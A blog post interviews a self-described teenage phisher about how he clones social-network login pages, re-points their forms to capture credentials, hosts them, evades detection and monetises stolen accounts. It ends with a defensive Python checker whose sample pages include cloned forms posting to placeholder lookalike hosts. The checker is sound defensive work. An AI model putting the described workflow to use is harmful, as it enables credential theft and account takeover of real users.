Okay, I had a lot of fun with this post. No new news here, but I was able to talk to someone who was willing to sit down and write out some thoughts from a phisher's perspective. The phisher goes by the name "lithium" and agreed to answer a number of questions that have been on my mind for a while now. Huge thanks to him, as I think a lot of this is valuable information to the community at large. These are his words, unmodified apart from spelling and punctuation:
How would you describe yourself? Age? Did you go to school? Interests?
Determined is the best word to describe myself. I'm 18 years young. Yes, I went to school. I left after high school. My interests are MMA (mixed martial arts), fitness and, last but not least, the internet!
How did you get your start in phishing? How did you get interested in it?
The typical scam mail that my parents kept receiving in their inbox. They were very poorly done! Yet in general they worked. So, I knew automatically I could come up with more efficient methods and have a far greater outcome.
How long have you been phishing?
I've been phishing since I turned 14. So that's nearly 5 years.
Do you have any idea how many people’s identities you’ve stolen so far?
Way over 20 million. Social networking worms really hit it off for me! I have so many hundreds of thousands of accounts to many websites I haven’t even got a chance to look through.
Did you need to forge any particular relationships with other people/groups to get started?
No, when I started I went solo. A lot of groups came to me asking if I wanted in; I declined.
What types of sites make the best phishing sites?
Social networking sites, any site that involves teenagers ranging from 14 years old upwards.
What are the steps you take to set up a phishing site?
I try to find a domain name that would best suit the current target, and try to find a few similarities which would make my site more realistic. Then, register it! I then find a reliable anonymous host (offshore are the most reliable), although I do tend to use compromised hosting accounts.
Secondly, I view the page source. Then I alter the source code to post the form's information to my phishing site.
Thirdly, I create a PHP file which will POST the current form's information to a text file on my server. I use the same PHP file with every site; just minor alterations are needed since it's merely a few lines of PHP code.
How many people do you typically phish per site you post?
That all depends on the size of the website (the amount of users). Usually, I phish 30k a day.
How do you monetize the identities and how much does that net you?
Social networking sites make me $500 to 1k through CPA deals. 5 times out of 10 the person uses the same password for their email account. Now, what is inside their email inbox determines how much more profit I make. If an email account has one of the following (PayPal/e-gold/RapidShare/eBay accounts, even the email account itself), I sell those to scammers. All in all, I make 3k to 4k a day. I only phish 3-4 days a week. It depends on how much time I invest; the more time I invest, the greater the outcome.
Are there any costs associated with phishing?
Yes, there are costs. A dedicated server, VPN, network encryption software and time.
What sort of hardware/software do you need to do this? Anything special (phishing kits, etc…)? What kind of internet connection do you use?
For MOST social networking sites, I use a program called MyChanger. You can find it on this website: www.myownchanger.com. This makes phishing so much faster on social networking sites. Everything is automated! Messaging/bulletins/comments/profile modifications, it's great. Other than that, I get A LOT of custom programs built to suit my needs from freelance developers. My internet connection isn't anything fancy, a standard 1mb ADSL line.
How do you keep yourself safe from being caught?
I use VPNs, dedicated servers, proxies, and my network traffic is encrypted. All payments are made through e-gold.
Are there any anti-phishing deterrents (tools or technology) that make life as a phisher harder?
Oh sure, there are many things that make phishing harder. But since Internet Explorer 7 and Firefox 2 have implemented anti-phishing protection, those two cause the most irritation.
Do you foresee any changes to the phishing industry that are worthy of note?
Anything else you’d like to share/last words?
Lazy web developers are the reason I'm still around phishing.
Pretty telling on the current state of affairs, I'd say. The first interesting point I took from this was that IE7 and FF2 are actually a somewhat okay deterrent. From the looks of it, the protection hasn't made much of a dent in volume; it has only changed the tactics phishers use. I suppose we could have guessed that, since there is no lack of phishing emails in our inboxes; still, I found it somewhat surprising that it was making any dent at all. I actually predicted that it would before IE 7.0 launched, but I lost a bit of hope afterwards. Interesting nonetheless.
The second is that the password is reused in more than one place 50% of the time. We already knew that, but it's interesting to hear from a phisher's perspective how that reuse is actually used to monetize the attack. A huge thanks to lithium who allowed me to post all of his words. Does it make you re-think that MySpace profile you set up?
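The setup lithium describes (clone the login page's source, re-point its form so the submitted fields land on his server, a few lines of PHP writing them to a text file) leaves a signature a defender can check for: a page with a password field whose form posts to a host the brand does not own. That holds whether the clone sits on a lookalike domain and posts to itself, or sits on a compromised hosting account and posts to the lookalike. The check below is an added example written for this page, not lithium's tooling and not code from the original post; the hostnames, the sample pages and the allowlist of legitimate hosts are constructed placeholders, and it only sees forms in static HTML, not credentials submitted by script.

```python
"""Flag password forms whose submission target is not a brand-owned host.

Added example for this page (not code from the original post). Models the
cloning step described in the interview: copy a login page, rewrite the
form action so credentials go to the phisher's server. All hosts below are
placeholders; LEGITIMATE_HOSTS stands in for a brand's real allowlist.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed allowlist: hosts the (fictional) brand actually uses for login.
LEGITIMATE_HOSTS = {"social-network.example", "login.social-network.example"}


class _FormScanner(HTMLParser):
    """Record each <form>'s action and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []          # [{"action": str, "has_password": bool}, ...]
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)      # valueless attributes map to None
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_forms_leaving_brand(page_url, html, legitimate_hosts):
    """Return absolute action URLs of password forms posting to a non-brand host.

    Relative or empty actions are resolved against page_url, so a genuine page
    posting back to itself on a brand host yields nothing, while a clone on a
    lookalike domain is flagged even when its action is relative.
    """
    legit = {h.lower() for h in legitimate_hosts}
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue                           # search boxes etc. are not of interest
        target = urljoin(page_url, form["action"])
        host = (urlparse(target).hostname or "").lower()
        if host not in legit:
            findings.append(target)
    return findings


# Constructed sample: the genuine page, posting to its own host.
GENUINE_PAGE = """<html><body>
<form method="post" action="/login">
  <input type="text" name="email"><input type="password" name="password">
</form></body></html>"""

# Constructed sample: clone hosted on a lookalike domain, relative action.
CLONE_ON_LOOKALIKE = """<html><body>
<form method="post" action="post.php">
  <input type="text" name="email"><input type="password" name="password">
</form>
<form method="get" action="/search"><input type="text" name="q"></form>
</body></html>"""

# Constructed sample: clone on a compromised host, posting to the lookalike.
CLONE_ON_COMPROMISED = """<html><body>
<form method="post" action="http://social-network-login.example/post.php">
  <input type="text" name="email"><input type="password" name="password">
</form></body></html>"""

if __name__ == "__main__":
    cases = [
        ("genuine", "https://social-network.example/login", GENUINE_PAGE),
        ("lookalike", "http://social-network-login.example/login.htm", CLONE_ON_LOOKALIKE),
        ("compromised", "http://compromised-host.example/~user/sn/login.html", CLONE_ON_COMPROMISED),
    ]
    for name, url, page in cases:
        hits = credential_forms_leaving_brand(url, page, LEGITIMATE_HOSTS)
        print(f"{name}: {hits or 'credentials stay on brand hosts'}")
```

Run against pages pulled from abuse reports or from a takedown feed, this separates the cloned login from ordinary mirrors of the brand's public pages; the allowlist is the part that has to be maintained, since a brand that adds a new login host without updating it will start flagging its own traffic.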